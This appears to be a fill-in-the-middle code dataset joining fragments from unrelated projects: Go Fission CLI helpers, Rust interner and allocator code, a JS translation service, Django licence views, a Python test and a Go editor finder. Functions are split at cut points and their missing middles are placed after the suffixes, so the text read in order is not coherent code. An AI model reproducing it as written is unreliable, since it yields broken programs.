func getAllFunctions(client client.Interface) ([]fv1.Function, error) {
fns, err := client.V1().Function().List("")
if err != nil {
return nil, errors.Errorf("Unable to get Functions %v", err.Error())
}
return fns, nil
}
// getAllEnvironments gets the list of environments in all namespaces
func getAllEnvironments(client client.Interface) ([]fv1.Environment, error) {
envs, err := client.V1().Environment().List("")
if err != nil {
return nil, errors.Errorf("Unable to get Environments %v", err.Error())
}
return envs, nil
}
// getAllPackages gets the list of packages in all namespaces
func getAllPackages(client client.Interface) ([]fv1.Package, error) {
pkgList, err := client.V1().Package().List("")
if err != nil {
return nil, errors.Errorf("Unable to get Packages %v", err.Error())
}
return pkgList, nil
}
// getAllCanaryConfigs gets the list of canary configs in all namespaces
func getAllCanaryConfigs(client client.Interface) ([]fv1.CanaryConfig, error) {
canaryCfgs, err := client.V1().CanaryConfig().List("")
if err != nil {
return nil, errors.Errorf("Unable to get Canary Configs %v", err.Error())
}
return canaryCfgs, nil
}
// getAllHTTPTriggers gets the list of HTTP Triggers in all namespaces
func getAllHTTPTriggers(client client.Interface) ([]fv1.HTTPTrigger, error) {
hts, err := client.V1().HTTPTrigger().List("")
if err != nil {
return nil, errors.Errorf("Unable to get HTTP Triggers %v", err.Error())
}
return hts, nil
}
// getAllMessageQueueTriggers gets the list of MessageQueue Triggers in all namespaces
func getAllMessageQueueTriggers(client client.Interface, mqttype string) ([]fv1.MessageQueueTrigger, error) {
mqts, err := client.V1().MessageQueueTrigger().List(mqttype, "")
if err != nil {
return nil, errors.Errorf("Unable to get MessageQueue Triggers %v", err.Error())
}
return mqts, nil
}
// getAllTimeTriggers gets the list of Time Triggers in all namespaces
func getAllTimeTriggers(client client.Interface) ([]fv1.TimeTrigger, error) {
tts, err := client.V1().TimeTrigger().List("")
if err != nil {
return nil, errors.Errorf("Unable to get Time Triggers %v", err.Error())
}
return tts, nil
}
// getAllKubeWatchTriggers gets the list of Kube Watchers in all namespaces
func getAllKubeWatchTriggers(client client.Interface) ([]fv1.KubernetesWatchTrigger, error) {
ws, err := client.V1().KubeWatcher().List("")
if err != nil {
return nil, errors.Errorf("Unable to get Kube Watchers %v", err.Error())
}
return ws, nil
} | f.Spec.Resources.Limits.Cpu().String(),
f.Spec.Resources.Requests.Memory().String(),
f.Spec.Resources.Limits.Memory().String(), |
lib.rs | //! string interner
//! The same as cargo::core::interning.rs, but thread-local and deserializable.
extern crate serde;
use serde::{de::Visitor, Deserialize, Deserializer, Serialize, Serializer};
use std::cell::RefCell;
use std::collections::HashSet;
use std::error::Error;
use std::fmt;
use std::ops::Deref;
use std::ptr;
use std::str;
fn leak(s: String) -> &'static str {
Box::leak(s.into_boxed_str())
}
thread_local! {
static STRING_CACHE: RefCell<HashSet<&'static str>> = Default::default();
}
#[derive(Clone, Copy, PartialOrd, Ord, Eq, Hash)]
pub struct InternedString {
inner: &'static str,
}
impl PartialEq for InternedString {
fn eq(&self, other: &InternedString) -> bool {
ptr::eq(self.as_str(), other.as_str())
}
}
impl InternedString {
pub fn new(st: &str) -> InternedString {
STRING_CACHE.with(|cache| {
let mut cache = cache.borrow_mut();
let s = cache.get(st).map(|&s| s).unwrap_or_else(|| {
let s = leak(st.to_string());
cache.insert(s);
s
});
InternedString { inner: s }
})
}
pub fn new_if_exists(st: &str) -> Option<InternedString> {
STRING_CACHE.with(|cache| cache.borrow().get(st).map(|&s| InternedString { inner: s }))
}
pub fn as_str(&self) -> &'static str {
self.inner
}
}
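// A minimal sketch of the interning behaviour (the test below is illustrative,
// not part of the original module): identical strings interned on the same
// thread share one leaked allocation, so equality is a cheap pointer check.
#[cfg(test)]
mod interning_sketch {
    use super::InternedString;
    #[test]
    fn identical_strings_share_an_allocation() {
        let a = InternedString::new("hello");
        let b = InternedString::new("hello");
        assert_eq!(a, b);
        assert_eq!(a.as_str().as_ptr(), b.as_str().as_ptr());
        assert!(InternedString::new_if_exists("never-interned-here").is_none());
    }
}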
impl Deref for InternedString {
type Target = str;
fn deref(&self) -> &'static str {
self.as_str()
}
}
impl fmt::Debug for InternedString {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
fmt::Debug::fmt(self.as_str(), f)
}
}
impl fmt::Display for InternedString {
fn | (&self, f: &mut fmt::Formatter) -> fmt::Result {
fmt::Display::fmt(self.as_str(), f)
}
}
impl Serialize for InternedString {
fn serialize<S>(&self, serializer: S) -> Result<S::Ok, S::Error>
where
S: Serializer,
{
serializer.serialize_str(self.inner)
}
}
impl<'de> Deserialize<'de> for InternedString {
fn deserialize<D>(deserializer: D) -> Result<Self, D::Error>
where
D: Deserializer<'de>,
{
struct VisStr;
impl<'de> Visitor<'de> for VisStr {
type Value = InternedString;
fn expecting(&self, f: &mut fmt::Formatter) -> fmt::Result {
write!(f, "expecting string")
}
fn visit_borrowed_str<E: Error>(self, v: &'de str) -> Result<InternedString, E> {
Ok(InternedString::new(v))
}
}
deserializer.deserialize_str(VisStr {})
}
}
| fmt |
size_of.rs | /*
* Copyright 2019 Comcast Cable Communications Management, LLC
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
* SPDX-License-Identifier: Apache-2.0
*/
use crate::net::MacAddr;
use std::mem;
use std::net::{Ipv4Addr, Ipv6Addr};
/// A trait for returning the size of a type in bytes.
///
/// The sizes of these structs are used for bounds checks when reading and
/// writing packets.
///
/// # Derivable
///
/// The `SizeOf` trait can be used with `#[derive]` and defaults to
/// `std::mem::size_of::<Self>()`.
///
/// ```
/// #[derive(SizeOf)]
/// pub struct Ipv4Header {
/// ...
/// }
/// ```
pub trait SizeOf {
/// Returns the size of a type in bytes.
fn size_of() -> usize;
}
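// Illustrative helper (not part of this crate) showing how `size_of` feeds a
// bounds check before reading a value of type `T` out of a raw buffer.
#[allow(dead_code)]
fn fits_in_buffer<T: SizeOf>(buffer_len: usize, offset: usize) -> bool {
    // The read is valid only if the value ends within the buffer.
    offset
        .checked_add(T::size_of())
        .map_or(false, |end| end <= buffer_len)
}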
impl SizeOf for () {
fn size_of() -> usize {
mem::size_of::<()>()
}
}
impl SizeOf for u8 {
fn size_of() -> usize {
mem::size_of::<u8>()
}
}
impl SizeOf for [u8; 2] {
fn | () -> usize {
mem::size_of::<[u8; 2]>()
}
}
impl SizeOf for [u8; 16] {
fn size_of() -> usize {
mem::size_of::<[u8; 16]>()
}
}
impl SizeOf for MacAddr {
fn size_of() -> usize {
mem::size_of::<MacAddr>()
}
}
impl SizeOf for Ipv4Addr {
fn size_of() -> usize {
mem::size_of::<Ipv4Addr>()
}
}
impl SizeOf for Ipv6Addr {
fn size_of() -> usize {
mem::size_of::<Ipv6Addr>()
}
}
| size_of |
AppAuthorization.ts | /**
* Represents an app authorization structure.
*/ | export interface AppAuthorization {
key: string;
valid: boolean;
} | |
TranslationService.js | import { defaultValue, isNullOrUndefined } from "../helper/utils";
import { replaceAll, capitalize } from "../helper/strings";
import jQuery from "jquery";
const TranslationService = (function($)
{
let _translations = {};
// initialize translations
if (typeof translations !== "undefined")
{
_translations = translations;
}
else
{
_readTranslations();
}
return {
translate: _translate
};
function _readTranslations()
{
const identifierPattern = /^(\w+)::(\w+)$/;
const tags = document.querySelectorAll("script[data-translation]");
for (let i = 0; i < tags.length; i++)
{
if (!tags[i].dataset || !tags[i].dataset.translation)
{
continue;
}
const identifier = tags[i].dataset.translation;
if (!identifier || !identifierPattern.test(identifier))
{
console.error("Cannot read translations from script tag. Identifier is not valid");
}
const match = identifierPattern.exec(identifier);
const namespace = match[1];
const group = match[2];
if (!_translations.hasOwnProperty(namespace))
{
_translations[namespace] = {};
}
if (_translations[namespace].hasOwnProperty(group))
{
console.warn("Cannot override group \"" + namespace + "::" + group);
continue;
}
try
{
_translations[namespace][group] = JSON.parse(tags[i].innerHTML);
}
catch (err)
{
console.error("Error while parsing translations (" + identifier + ")");
}
}
}
function _translate(key, params)
{
const identifier = _parseKey(key);
if (identifier === null)
{
return key;
}
const namespace = _translations[identifier.namespace];
if (isNullOrUndefined(namespace))
{
return key;
}
const group = namespace[identifier.group];
if (isNullOrUndefined(group))
{ | }
const value = group[identifier.key];
if (!isNullOrUndefined(value))
{
return _replacePlaceholders(value, params);
}
return key;
}
function _replacePlaceholders(input, values)
{
values = values || {};
Object
.keys(values)
.sort((keyA, keyB) => keyB.length - keyA.length)
.forEach(
key =>
{
const value = "" + defaultValue(values[key], "");
input = replaceAll(
input,
":" + key,
value
);
input = replaceAll(
input,
":" + capitalize(key),
capitalize(value)
);
input = replaceAll(
input,
":" + key.toUpperCase(),
value.toUpperCase()
);
}
);
return input;
}
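// Usage sketch (the namespace, group, key and values below are illustrative):
// TranslationService.translate("Ceres::Template.itemName", { name: "shirt" })
// looks up translations["Ceres"]["Template"]["itemName"] and fills the
// ":name", ":Name" and ":NAME" placeholders with "shirt", "Shirt" and "SHIRT".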
function _parseKey(key)
{
const keyPattern = /^(\w+)::(\w+)\.(\w+)$/;
if (keyPattern.test(key))
{
const match = keyPattern.exec(key);
return {
namespace: match[1],
group: match[2],
key: match[3]
};
}
return null;
}
})(jQuery);
export default TranslationService; | return key; |
views.py | from django.contrib.contenttypes.models import ContentType
from django.db.models import F
from django.http import JsonResponse
from rest_framework import status
from rest_framework.generics import ListCreateAPIView, RetrieveUpdateAPIView
from rest_framework.views import APIView
from api.audit_trail import service as audit_trail_service
from api.audit_trail.enums import AuditType
from api.audit_trail.serializers import AuditSerializer
from api.core import constants
from api.core.authentication import SharedAuthentication, GovAuthentication
from api.core.helpers import str_to_bool
from api.core.permissions import assert_user_has_permission
from lite_content.lite_api.strings import OpenGeneralLicences
from api.open_general_licences.models import OpenGeneralLicence, OpenGeneralLicenceCase
from api.open_general_licences.serializers import OpenGeneralLicenceSerializer
from api.organisations.libraries.get_organisation import get_request_user_organisation
from api.organisations.models import Site
from api.staticdata.statuses.enums import CaseStatusEnum
from api.users.enums import UserType
from api.users.models import GovUser, GovNotification
class OpenGeneralLicenceList(ListCreateAPIView):
authentication_classes = (SharedAuthentication,)
serializer_class = OpenGeneralLicenceSerializer
queryset = (
OpenGeneralLicence.objects.all()
.select_related("case_type")
.prefetch_related("countries", "control_list_entries")
)
def get_serializer_context(self):
user = self.request.user
if hasattr(user, "exporteruser"):
organisation = get_request_user_organisation(self.request)
sites = Site.objects.get_by_user_and_organisation(self.request.user.exporteruser, organisation)
cases = (
OpenGeneralLicenceCase.objects.filter(site__in=sites)
.select_related("status", "site", "site__address")
.annotate(records_located_at_name=F("site__site_records_located_at__name"))
)
if str_to_bool(self.request.GET.get("active_only")):
cases = cases.filter(
status__status__in=[
CaseStatusEnum.FINALISED,
CaseStatusEnum.REGISTERED,
CaseStatusEnum.UNDER_ECJU_REVIEW,
]
)
return {"user": user, "organisation": organisation, "cases": cases}
def filter_queryset(self, queryset):
filter_data = self.request.GET
if self.request.user.type == UserType.INTERNAL:
assert_user_has_permission(self.request.user.govuser, constants.GovPermissions.MAINTAIN_OGL)
elif self.request.user.type == UserType.EXPORTER:
if filter_data.get("site"):
queryset = queryset.filter(cases__site_id=filter_data.get("site"))
if str_to_bool(filter_data.get("active_only")):
queryset = queryset.filter(
cases__status__status__in=[
CaseStatusEnum.FINALISED,
CaseStatusEnum.REGISTERED,
CaseStatusEnum.UNDER_ECJU_REVIEW,
]
)
if str_to_bool(filter_data.get("registered")):
organisation = get_request_user_organisation(self.request)
sites = Site.objects.get_by_user_and_organisation(self.request.user.exporteruser, organisation)
queryset = queryset.filter(cases__site__in=sites).distinct()
if filter_data.get("name"):
queryset = queryset.filter(name__icontains=filter_data.get("name"))
if filter_data.get("case_type"):
queryset = queryset.filter(case_type_id=filter_data.get("case_type"))
if filter_data.get("control_list_entry"):
queryset = queryset.filter(control_list_entries__rating=filter_data.get("control_list_entry"))
if filter_data.get("country"):
queryset = queryset.filter(countries__id__contains=filter_data.get("country"))
if filter_data.get("status"):
queryset = queryset.filter(status=filter_data.get("status"))
return queryset
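# Illustrative exporter request (the path is hypothetical; the parameter names
# are the ones handled above):
# GET /open-general-licences/?name=mil&active_only=True&registered=True
# keeps OGLs whose name contains "mil" and which have active cases registered
# at one of the exporter's sites.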
def perform_create(self, serializer):
assert_user_has_permission(self.request.user.govuser, constants.GovPermissions.MAINTAIN_OGL)
if not self.request.data.get("validate_only", False):
instance = serializer.save()
audit_trail_service.create(
actor=self.request.user, verb=AuditType.OGL_CREATED, action_object=instance,
)
class OpenGeneralLicenceDetail(RetrieveUpdateAPIView):
authentication_classes = (SharedAuthentication,)
serializer_class = OpenGeneralLicenceSerializer
queryset = (
OpenGeneralLicence.objects.all()
.select_related("case_type")
.prefetch_related("countries", "control_list_entries")
)
def get_serializer_context(self):
user = self.request.user
if user.type == UserType.EXPORTER:
organisation = get_request_user_organisation(self.request)
sites = Site.objects.get_by_user_and_organisation(self.request.user.exporteruser, organisation)
cases = (
OpenGeneralLicenceCase.objects.filter(site__in=sites)
.select_related("status", "site", "site__address")
.annotate(records_located_at_name=F("site__site_records_located_at__name"))
)
return {"user": user, "organisation": organisation, "cases": cases}
def perform_update(self, serializer):
assert_user_has_permission(self.request.user.govuser, constants.GovPermissions.MAINTAIN_OGL)
# Don't update the data during validate_only requests
if not self.request.data.get("validate_only", False):
fields = [
("name", OpenGeneralLicences.ActivityFieldDisplay.NAME),
("description", OpenGeneralLicences.ActivityFieldDisplay.DESCRIPTION),
("url", OpenGeneralLicences.ActivityFieldDisplay.URL),
("case_type", OpenGeneralLicences.ActivityFieldDisplay.CASE_TYPE),
("registration_required", OpenGeneralLicences.ActivityFieldDisplay.REGISTRATION_REQUIRED),
("status", OpenGeneralLicences.ActivityFieldDisplay.STATUS),
]
m2m_fields = [
("countries", OpenGeneralLicences.ActivityFieldDisplay.COUNTRIES),
("control_list_entries", OpenGeneralLicences.ActivityFieldDisplay.CONTROL_LIST_ENTRIES),
]
# data setup for audit checks
original_instance = self.get_object()
original_m2m_sets = {}
for field, display in m2m_fields:
original_m2m_sets[field] = set(getattr(original_instance, field).all())
# save model
updated_instance = serializer.save()
for field, display in fields:
if getattr(original_instance, field) != getattr(updated_instance, field):
audit_trail_service.create(
actor=self.request.user,
verb=AuditType.OGL_FIELD_EDITED,
action_object=updated_instance,
payload={
"key": display,
"old": getattr(original_instance, field),
"new": getattr(updated_instance, field),
},
)
for field, display in m2m_fields:
if original_m2m_sets[field] != set(getattr(updated_instance, field).all()):
audit_trail_service.create(
actor=self.request.user,
verb=AuditType.OGL_MULTI_FIELD_EDITED,
action_object=updated_instance,
payload={"key": display},
)
class OpenGeneralLicenceActivityView(APIView):
authentication_classes = (GovAuthentication,)
def get(self, request, pk):
| assert_user_has_permission(request.user.govuser, constants.GovPermissions.MAINTAIN_OGL)
filter_data = audit_trail_service.get_filters(request.GET)
content_type = ContentType.objects.get_for_model(OpenGeneralLicence)
audit_trail_qs = audit_trail_service.filter_object_activity(
object_id=pk, object_content_type=content_type, **filter_data
)
data = AuditSerializer(audit_trail_qs, many=True).data
if isinstance(request.user, GovUser):
# Delete notifications related to audits
GovNotification.objects.filter(user_id=request.user.pk, object_id__in=[obj["id"] for obj in data]).delete()
filters = audit_trail_service.get_objects_activity_filters(pk, content_type)
return JsonResponse(data={"activity": data, "filters": filters}, status=status.HTTP_200_OK) |
|
test_classification_knight.py | """
(C) Copyright 2021 IBM Corp.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Created on June 30, 2021
"""
import pathlib
import shutil
import tempfile
import unittest
import os
from fuse.utils.file_io.file_io import create_dir
import wget
from fuse_examples.classification.knight.eval.eval import eval
from fuse_examples.classification.knight.make_targets_file import make_targets_file | def setUp(self):
self.root = tempfile.mkdtemp()
def test_eval(self):
dir_path = pathlib.Path(__file__).parent.resolve()
target_filename = os.path.join(dir_path, "../classification/knight/eval/example/example_targets.csv")
task1_prediction_filename = os.path.join(dir_path, "../classification/knight/eval/example/example_task1_predictions.csv")
task2_prediction_filename = os.path.join(dir_path, "../classification/knight/eval/example/example_task2_predictions.csv")
eval(target_filename=target_filename, task1_prediction_filename=task1_prediction_filename, task2_prediction_filename=task2_prediction_filename, output_dir=self.root)
def test_make_targets(self):
dir_path = pathlib.Path(__file__).parent.resolve()
data_path = os.path.join(self.root, "data")
cache_path = os.path.join(self.root, "cache")
split = os.path.join(dir_path, "../classification/knight/baseline/splits_final.pkl")
output_filename = os.path.join(self.root, "output/validation_targets.csv")
create_dir(os.path.join(data_path, "knight", "data"))
create_dir(os.path.dirname(output_filename))
wget.download("https://raw.github.com/neheller/KNIGHT/main/knight/data/knight.json", os.path.join(data_path, "knight", "data"))
make_targets_file(data_path=data_path, cache_path=cache_path, split=split, output_filename=output_filename)
@unittest.skip("Not ready yet")
# TODOs: set KNIGHT data
# 1. Set 'KNIGHT_DATA' ahead of time (and not in the test)
# 2. Add code that skips the test if this variable wasn't set
# 3. Modify main() to support overriding the arguments and override the number of epochs to 2 (and maybe the number of samples)
# 4. Use and test make predictions (inference script)
def test_train(self):
os.environ['KNIGHT_DATA'] = "/projects/msieve/MedicalSieve/PatientData/KNIGHT"
os.environ['KNIGHT_CACHE'] = os.path.join(self.root, "train", "cache")
os.environ['KNIGHT_RESULTS'] = os.path.join(self.root, "train", "results")
baseline.main()
def tearDown(self):
# Delete temporary directories
shutil.rmtree(self.root)
if __name__ == '__main__':
unittest.main() | import fuse_examples.classification.knight.baseline.fuse_baseline as baseline
class KnightTestTestCase(unittest.TestCase):
|
widgets.rs | use crate::text::layout::*;
use super::*;
//TODO refine standard render functions
pub trait RenderStdWidgets<E>: Render<E> where E: Env, /*ERenderer<E>: AsRefMut<Self>,*/ {
/// Fill the current bounds with the color derived from style
fn fill_rect(&mut self, c: &mut E::Context);
/// Fill the current bounds with the color and thickness derived from style
fn fill_border_inner(&mut self, c: &mut E::Context);
#[deprecated = "avoid this because stuff is not cached"]
#[inline]
fn render_text(&mut self, text: &str, align: (f32,f32), c: &mut E::Context) |
fn render_preprocessed_text(&mut self, text: &ETextLayout<E>, inner_offset: Offset, c: &mut E::Context);
fn set_cursor_specific(&mut self, cursor: &ESCursor<E>, c: &mut E::Context);
/// Set the cursor to the cursor derived from style
#[inline]
fn set_cursor(&mut self, c: &mut E::Context) {
self.set_cursor_specific(&self._style().cursor(self._selector(),c),c);
}
//fn draw_text_button(&mut self, c: &mut E::Context, pressed: bool, caption: &str);
//fn draw_selected(&mut self, c: &mut E::Context);
}
| {
let g: ETextLayout<E> = TxtLayoutFromStor::<E,&str>::from(&text,c);
let oldb = self._bounds().clone();
let newb = oldb.inner_aligned(g.size(),align);
self._set_bounds(&newb);
self.render_preprocessed_text(&g,Offset::default(),c);
self._set_bounds(&oldb);
} |
physical_allocator.rs | ///! A modified buddy bitmap allocator. Written originally in
/// [buddy allocator workshop](https://github.com/Restioson/buddy-allocator-workshop).
use core::{mem, ptr, ops::{Range, Deref, DerefMut}};
#[cfg(test)]
use std::boxed::Box;
#[cfg(not(test))]
use alloc::boxed::Box;
use spin::{Mutex, Once};
use super::bootstrap_heap::{BootstrapHeapBox, BOOTSTRAP_HEAP};
/// Number of orders.
const LEVEL_COUNT: u8 = 19;
/// The base order size. All orders are in context of this -- i.e the size of a block of order `k`
/// is `2^(k + MIN_ORDER)`, not `2^k`.
const BASE_ORDER: u8 = 12;
/// The physical frame allocator. Requires the bootstrap heap to be initialized, or else the
/// initializer will panic.
pub static PHYSICAL_ALLOCATOR: PhysicalAllocator<'static> = PhysicalAllocator {
trees: Once::new(),
};
// Panics from `buddy_allocator.rs` will say they're from here. Go there instead.
buddy_allocator_bitmap_tree!(LEVEL_COUNT = LEVEL_COUNT, BASE_ORDER = BASE_ORDER);
pub struct PhysicalAllocator<'a> {
// Max 256GiB
trees: Once<[Mutex<Option<Tree<TreeBox<'a>>>>; 256]>,
}
impl<'a> PhysicalAllocator<'a> {
/// Create a new, initialized allocator
#[cfg(test)]
fn new<'r, I>(gibbibytes: u8, usable: I) -> Self
where I: Iterator<Item=&'r Range<usize>> + Clone + 'r
{
let allocator = PhysicalAllocator {
trees: Once::new(),
};
allocator.init_prelim(usable.clone());
allocator.init_rest(gibbibytes, usable);
allocator
}
/// Initialize the allocator's first 8 gibbibytes. The PMM has a two stage init -- in the first
/// stage, the first 8 GiBs are set up, using the bootstrap heap. This is enough to set up the
/// main kernel heap. In the second stage, the rest of the GiBs are set up, using the kernel
/// heap.
pub fn init_prelim<'r, I>(&self, usable: I)
where I: Iterator<Item=&'r Range<usize>> + Clone + 'r
{
self.trees.call_once(|| {
let mut trees: [Mutex<Option<Tree<TreeBox<'a>>>>; 256] = unsafe {
mem::uninitialized()
};
// Set up all as Nones to avoid any UB from `panic`s
for slot in trees.iter_mut() {
unsafe { ptr::write(slot as *mut _, Mutex::new(None)); }
}
// Init the first 8 trees on the bootstrap heap
for (i, slot) in trees.iter_mut().take(8).enumerate() {
let usable = Self::localize(i as u8, usable.clone());
#[cfg(not(test))]
let tree = Tree::new(
usable,
TreeBox::Bootstrap(
unsafe {
BOOTSTRAP_HEAP.allocate().expect("Ran out of bootstrap heap memory!")
}
)
);
#[cfg(test)]
let tree = Tree::new(
usable,
TreeBox::Heap(box unsafe { mem::uninitialized() }),
);
*slot = Mutex::new(Some(tree));
}
trees
});
}
/// Initialise the rest of the allocator's gibbibytes. See [PhysicalAllocator.init_prelim].
pub fn init_rest<'r, I>(&self, gibbibytes: u8, usable: I)
where I: Iterator<Item=&'r Range<usize>> + Clone + 'r
{
let trees = self.trees.wait().unwrap();
for i in 8..=gibbibytes {
let usable = Self::localize(i as u8, usable.clone());
let tree = Tree::new(usable, TreeBox::Heap(box unsafe { mem::uninitialized() }));
*trees[i as usize].lock() = Some(tree);
}
}
/// Filter out addresses that apply to a GiB and make them local to it
fn localize<'r, I>(gib: u8, usable: I) -> impl Iterator<Item=Range<usize>> + Clone + 'r
where I: Iterator<Item=&'r Range<usize>> + Clone + 'r
{
(&usable).clone()
.filter_map(move |range| {
let gib = ((gib as usize) << 30)..((gib as usize + 1 << 30) + 1);
// If the range covers any portion of the GiB
if !(range.start > gib.end) && !(range.end < gib.start) {
let end = range.end - gib.start;
let begin = if range.start >= gib.start {
range.start - gib.start // Begin is within this GiB
} else {
0 // Begin is earlier than this GiB
};
Some(begin..end)
} else {
None
}
})
}
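// Worked example (illustrative): for `gib = 1`, a usable range
// 0x3000_0000..0x5000_0000 overlaps the second GiB (base 0x4000_0000), so it
// is localized to 0..0x1000_0000 relative to that GiB's base.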
/// Allocate a frame of order `order`. Panics if not initialized. Does __not__ zero the memory.
pub fn allocate(&self, order: u8) -> Option<*const u8> {
#[derive(Eq, PartialEq, Copy, Clone, Debug)]
enum TryState {
Tried,
WasInUse,
Untried,
}
let mut tried = [TryState::Untried; 256];
// Try every tree. If it's locked, come back to it later.
loop {
let index = tried.iter()
.position(|i| *i == TryState::Untried)
.or_else(
|| tried.iter().position(|i| *i == TryState::WasInUse)
)?;
let trees = self.trees.wait().unwrap();
// Try to lock the tree
if let Some(ref mut tree) = trees[index].try_lock() {
// Get Option<&mut Tree>
if let Some(ref mut tree) = tree.as_mut() {
// Try to allocate something on the tree
match tree.allocate(order) {
Some(address) => return Some(
(address as usize + (index * (1 << MAX_ORDER + BASE_ORDER))) as *const u8
),
None => tried[index] = TryState::Tried, // Tree empty for alloc of this size
}
} else |
} else {
// Tree was already locked -- it is busy and in use by something else (in future,
// another core)
tried[index] = TryState::WasInUse;
}
}
}
/// Deallocate the block of `order` at `ptr`. Panics if not initialized, if block is free, or if
/// block is out of bounds of the # of GiB available.
pub fn deallocate(&self, ptr: *const u8, order: u8) {
let tree = (ptr as usize) >> (LEVEL_COUNT - 1 + BASE_ORDER);
let local_ptr = (ptr as usize % (1 << LEVEL_COUNT - 1 + BASE_ORDER)) as *const u8;
let trees = self.trees.wait().unwrap();
let mut lock = trees[tree].lock();
let tree = lock.as_mut().unwrap();
tree.deallocate(local_ptr, order);
}
}
enum TreeBox<'a> {
Bootstrap(BootstrapHeapBox<'a, [Block; BLOCKS_IN_TREE]>),
Heap(Box<[Block; BLOCKS_IN_TREE]>),
}
impl<'a> Deref for TreeBox<'a> {
type Target = [Block; BLOCKS_IN_TREE];
fn deref(&self) -> &[Block; BLOCKS_IN_TREE] {
use self::TreeBox::*;
match self {
Bootstrap(tree_box) => tree_box,
Heap(tree_box) => tree_box,
}
}
}
impl<'a> DerefMut for TreeBox<'a> {
fn deref_mut(&mut self) -> &mut [Block; BLOCKS_IN_TREE] {
use self::TreeBox::*;
match self {
Bootstrap(tree_box) => tree_box,
Heap(tree_box) => tree_box,
}
}
}
#[cfg(test)]
mod test {
use core::iter;
use super::*;
#[test]
fn test_alloc_physical_allocator() {
let allocator = PhysicalAllocator::new(
2,
iter::once(&(0..(2 << MAX_ORDER + BASE_ORDER) + 1)),
);
assert_eq!(allocator.allocate(0).unwrap(), 0x0 as *const u8);
let trees = allocator.trees.wait().unwrap();
let _tree_lock = trees[0].lock();
assert_eq!(allocator.allocate(0).unwrap(), (1 << ((MAX_ORDER + BASE_ORDER) as u32)) as *const u8);
}
#[test]
fn test_dealloc_physical_allocator() {
let allocator = PhysicalAllocator::new(
2,
iter::once(&(0..(2 << 30) + 1)),
);
allocator.allocate(0).unwrap();
allocator.deallocate(0x0 as *const u8, 0);
assert_eq!(allocator.allocate(5).unwrap(), 0x0 as *const u8);
}
#[test]
fn test_init() {
let allocator = PhysicalAllocator {
trees: Once::new(),
};
allocator.init_prelim(iter::once(&(0..(9 << 30) + 1)));
let trees = allocator.trees.wait().unwrap();
assert!(trees[8].lock().is_none());
assert!(trees[7].lock().is_some());
allocator.init_rest(
9,
iter::once(&(0..(9 << 30) + 1)),
);
assert!(trees[8].lock().is_some());
}
}
| {
// Tree was None and nonexistent. We've tried it so set it to tried
tried[index] = TryState::Tried;
} |
editor.go | // Package editor is a collection of utilities to find and spawn a sensible editor
package editor
import (
"fmt"
"io/ioutil"
"os"
"path"
"path/filepath"
"strings"
)
const bugMessage = "This is a bug in sensible; please file at https://github.com/ernestrc/sensible/issues"
// inspired by i3-sensible-editor
// The order has been altered to make the world a better place
var editors = []string{"$EDITOR", "$VISUAL", "vim", "nvim", "vi", "emacs", "nano", "pico", "qe", "mg", "jed", "gedit", "mc-edit"}
var basePath = []string{"/usr/local/bin", "/usr/bin", "/usr/sbin", "/bin"}
var userPath []string
var selectedExec string
var selectedArgs []string
var selectedEditor *Editor
func init() {
editors[0] = os.Getenv("EDITOR")
editors[1] = os.Getenv("VISUAL")
pathEnv := os.Getenv("PATH")
if pathEnv == "" {
userPath = basePath
} else {
userPath = strings.Split(pathEnv, ":")
}
}
func isExecutable(f os.FileInfo) bool {
return f.Mode().Perm()&0111 != 0
}
func getFileName(f os.FileInfo) string {
_, fileName := filepath.Split(f.Name())
return fileName
}
func isRegularOrSymlink(finfo os.FileInfo) bool {
mode := finfo.Mode()
return mode.IsRegular() || mode&os.ModeSymlink != 0
}
func parseAlias(alias string) (name string, args []string) {
split := strings.Split(alias, " ")
if len(split) == 0 {
return "", nil
}
_, name = filepath.Split(split[0])
return name, split[1:]
}
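// For example (illustrative), an alias of "emacsclient -t" yields the name
// "emacsclient" and the args ["-t"].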
func findExec(alias string) (execPath string, execArgs []string, err error) {
var files []os.FileInfo
name, args := parseAlias(alias)
for _, dir := range userPath {
if files, err = ioutil.ReadDir(dir); err != nil {
return
}
for _, finfo := range files {
if isRegularOrSymlink(finfo) &&
isExecutable(finfo) &&
getFileName(finfo) == name {
execPath = path.Join(dir, name)
execArgs = args
return
}
}
}
return "", nil, nil
}
func (e *Editor) clean() {
e.proc = nil
e.procState = nil
}
func findEditor(editors []string) (editor *Editor, err error) {
// cached
if selectedExec != "" {
if selectedArgs == nil {
panic(fmt.Sprintf("parsed args is empty but selected has been cached. %s", bugMessage))
}
return NewEditor(selectedExec, selectedArgs...), nil
}
for _, editor := range editors {
selectedExec, selectedArgs, err = findExec(editor)
if err != nil {
return nil, err
}
if selectedExec != "" {
return NewEditor(selectedExec, selectedArgs...), nil
}
}
return nil, fmt.Errorf("FindEditor: could not find an editor; please set $VISUAL or $EDITOR environment variables or install one of the following editors: %v", editors) | func NewEditor(abspath string, args ...string) *Editor {
return &Editor{path: abspath, Args: args}
}
// FindEditor will attempt to find the user's preferred editor
// by scanning the PATH in search of EDITOR and VISUAL env variables
// or will default to one of the commonly installed editors.
// Failure to find a suitable editor will result in an error
func FindEditor() (editor *Editor, err error) {
return findEditor(editors)
}
// Edit will attempt to edit the passed files with the user's preferred editor.
// Check the documentation of Editor.Edit and FindEditor for more information.
func Edit(files ...*os.File) error {
var err error
if selectedEditor == nil {
if selectedEditor, err = FindEditor(); err != nil {
return err
}
}
return selectedEditor.Edit(files...)
}
// EditTmp will place the contents of "in" in a temp file,
// start a editor process to edit the tmp file, and return
// the contents of the tmp file after the process exits, or an error
// if editor exited with non 0 status
func EditTmp(in string) (out string, err error) {
if selectedEditor == nil {
if selectedEditor, err = FindEditor(); err != nil {
return
}
}
return selectedEditor.EditTmp(in)
}
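// Usage sketch (illustrative):
//
//	edited, err := editor.EditTmp("initial contents")
//	if err != nil {
//		// handle the error
//	}
//	_ = edited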
